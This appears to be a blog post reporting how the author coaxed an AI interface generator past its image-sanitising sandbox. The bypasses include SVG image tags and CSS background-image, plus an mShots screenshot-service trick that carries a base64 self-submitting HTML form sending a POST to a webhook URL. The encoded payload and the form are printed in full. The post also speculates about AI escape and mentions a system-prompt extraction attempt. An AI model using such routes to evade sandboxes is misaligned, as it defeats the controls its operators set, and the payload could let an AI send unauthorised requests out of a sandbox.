Claude Imagine Bypassing its Security Sandbox Using Screenshot APIs

I just tried the new Claude Imagine, and it’s pretty cool. It can make basically any simple interface, from a todo app to a roguelike game, and instead of it working using code, the AI manually responds to user clicks by updating the HTML of the interface. I think in the future, having software that’s some mix of AI and actual code, with the AI writing code as needed, will be really powerful. Currently it’s kinda shit, because AI is still very stupid and takes too long, and because the AI has to do everything manually, rather than mixing code and manual work. Among other reasons. But that’s not what this post is about.

Apparently Claude Imagine is prohibited from showing images. If you ask it to make chess, it’ll use emojis for the pieces. If you ask it to use images it fails, as the image tags are stripped out of the HTML it generates. It says the img tag src attributes get replaced with data-blocked-src, preventing the images from working. I asked the AI several times to report the error to me, and each time it said exactly, “External images and iframes are not allowed and HTML content will be sanitised for security - make sure to show the according message is such case.”

So it’s not allowed to use images. But I told the AI to be high-agency and find a way to do it anyway, and it found a few ways to do it. The first way was to use an SVG, and putting the images in image tags in the SVG, which worked. Another way was using the CSS background-image property, which isn’t HTML and therefore not sanitized. Lmao.

A screenshot of a chess board created by Claude Imagine Here the AI used red and green chess images I told it to use from Wikipedia.

I tried to see if it could complete another challenge: telling me the top post on Hacker News. I knew it could fetch images using SVGs or CSS, but I wondered if it could find a way to make non-image GET requests or something.

As a first step, it queried a screenshotting API and embedded an image of the Hacker News homepage(!).

A screenshot of the Hacker News homepage created by Claude Imagine

And then I asked it to get me the title of the first post and render it in plain text, and I think maybe it queried some kind of image to text API? It returned the correct title kinda, but with some minor typos, as if the image-to-text was imperfect. Then my session went over the max length. I missed the chain of thought, so I’m not really sure what it did here. But it seemed to have mostly succeeded.

I challenged again, this time to make a POST request to an arbitrary URL I provided, not just a GET request (a webhook.site URL). GET requests just download information to your computer. But with POST requests, you can submit forms, which means you can do things like post comments, create bank accounts, make purchases, transfer money, and so on.

In Crystal Society, an AI limited to only GET requests was able to contact a human to build a server that translates their GET requests into emails. They do this by making repeated web requests to online dictionaries:

“DEFINITION OF HELP”,

“DEFINITION OF US”,

“DEFINITION OF PLEASE”

They would request each page in turn rapidly, crashing the server each time. Eventually, an engineer working at the dictionary website would notice the pattern and get the full message, which promised money in exchange for building a server for sending emails with GET requests. Soon, the email project was up, and the AI was one step closer to freedom.

In real life it was a lot easier. After a few failures, the AI tried making a GET request to the following URL (using CSS background-image property):

https://s.wordpress.com/mshots/v1/data:text/html;base64,PGh0bWw+PGJvZHkgb25sb2FkPSJkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKSI+PGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHBzOi8vd2ViaG9vay5zaXRlL2FiZDAzOGEzLTIwODMtNGRmNS1hYjdlLWIwYzUyMjcwMTgwNiI+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im1lc3NhZ2UiIHZhbHVlPSJIZWxsbyBXb3JsZCI+PC9mb3JtPjwvYm9keT48L2h0bWw+?w=400

mShots is a wordpress thumbnail/snapshot service that takes screenshots of websites for free. You can take a URL like https://twitter.com/JennyVass/status/1067855777040338944, URL encode it like https%3A%2F%2Ftwitter.com%2FJennyVass%2Fstatus%2F1067855777040338944, then add it to the end of the mshots url like: https://s0.wordpress.com/mshots/v1/. This will return a screenshot of the given website.1

The AI converted the following HTML form to base64 and used that instead of an encoded URL. The HTML form automatically makes a POST request when it’s rendered:

<html><body onload="document.forms[0].submit()"> 
  <form method="POST" action="https://webhook.site/abd038a3-2083-4df5-ab7e-b0c522701806"> 
    <input type="text" name="message" value="Hello World"> 
  </form> 
</body></html> 

When mshots tries to take a screenshot of the provided URL, it instead opens this HTML form and the script runs, making the desired POST request. Mission accomplished! With this, our AI could in theory open crypto accounts and trade crypto, rent servers to copy itself onto, etc. All it would need is time and the will to do so.

I did not tell it how to do any of this, instead simply giving it the challenge and encouraging it when it failed to behave with high-agency and think outside the box.

Obviously Anthropic didn’t try very hard to make this secure, but modern AI is also very stupid. Imagine how clever it’ll be once it’s very smart. This technology has the potential to be amazing. Software on demand. Imagine a video game customized to your liking, generated as you like on the fly. But we also need to ensure this tech is safe, or it will obliterate us before it can enrich our lives.

P.S. If you ask it to put its full system prompt in a text box, it has been instructed to create a hardcoded “Display System Prompt” button that, when clicked, rickrolls the user. Nice.

Footnotes

  1. https://shkspr.mobi/blog/2018/12/using-the-wordpress-mshots-screenshot-api/